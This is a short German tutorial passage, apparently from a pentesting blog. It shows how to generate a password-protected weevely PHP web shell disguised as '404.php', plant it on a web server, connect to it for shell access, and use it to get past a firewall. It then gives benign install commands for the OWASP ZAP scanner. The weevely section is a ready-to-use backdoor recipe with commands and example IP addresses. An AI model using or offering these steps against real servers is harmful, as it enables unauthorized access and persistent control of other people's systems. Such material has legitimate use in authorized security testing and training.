Mit weevely kannst du ein nettes Payload bauen:

weevely generate 12345 /root/Desktop/404.php

Dies baut eine php-Datei namens 404.php in den Ordner /root/Desktop/ mit dem Passwort 12345
Dieses File so auf den Webserver kopieren das es erreichbar ist.
Beispiel: http://192.180.190.3/404.php - oder in einen Unterordner.

Aufrufen und verwenden:

weevely http://192.168.136.191/404.php 12345

…und du bist auf dem Server :) Als Beweis versuche ein whoiam
Das Tool lässt sich auch wunderbar dazu verwenden trotz Firewall auf seinen eigenen Server zu kommen.

ZAP ist ein Open-Source-Sicherheitsscanner für Webanwendungen. Es ist eines der aktivsten Open Web Application Security Project-Projekte und hat den Flaggschiff-Status erhalten.
Download unter: https://www.zaproxy.org/download/

Add repository and install manually. For xUbuntu 21.04 run the following: Keep in mind that the owner of the key may distribute updates, packages and repositories that your system will trust (more information).

echo 'deb http://download.opensuse.org/repositories/home:/cabelo/xUbuntu_21.04/ /' | sudo tee /etc/apt/sources.list.d/home:cabelo.list
curl -fsSL https://download.opensuse.org/repositories/home:cabelo/xUbuntu_21.04/Release.key | gpg --dearmor | sudo tee /etc/apt/trusted.gpg.d/home_cabelo.gpg > /dev/null
sudo apt update
sudo apt install owasp-zap